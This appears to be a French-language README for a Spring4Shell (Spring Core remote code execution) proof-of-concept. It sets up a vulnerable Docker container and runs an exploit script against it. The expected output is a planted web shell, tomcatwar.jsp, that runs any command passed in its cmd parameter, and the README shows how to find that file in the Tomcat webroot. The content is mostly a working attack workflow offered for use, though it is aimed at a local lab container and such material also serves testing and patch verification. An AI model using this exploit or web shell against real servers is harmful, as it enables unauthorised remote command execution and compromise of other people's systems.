
Another spring4shell (Spring core RCE) POC
Cette vulnérabilité affecte Spring Core et permet à un attaquant d'envoyer une requête HTTP spécialement conçue pour contourner les protections du parseur de requêtes HTTP de la bibliothèque, menant à une exécution de code à distance.
Plus d'informations ici

Pour que cette vulnérabilité soit exploitée, plusieurs conditions doivent être remplies
docker build . -t springshell-rce-poc
docker run --rm -p 8081:8080 --name springshell-rce-poc springshell-rce-poc
python exploit-poc.py --url "http://127.0.0.1:8081/"
La réponse attendue
exploiting
Shell URL:http://127.0.0.1:8081/tomcatwar.jsp?pwd=j&cmd=whoami
Si vous accédez à cette URL, elle exécutera la commande de votre choix cmd=<cequevousvoulez>

Si vous vous connectez en SSH au conteneur, vous verrez qu'un nouveau fichier a été créé tomcatwar.jsp
docker exec -it springshell-rce-poc /bin/bash
ls /usr/local/tomcat/webapps/ROOT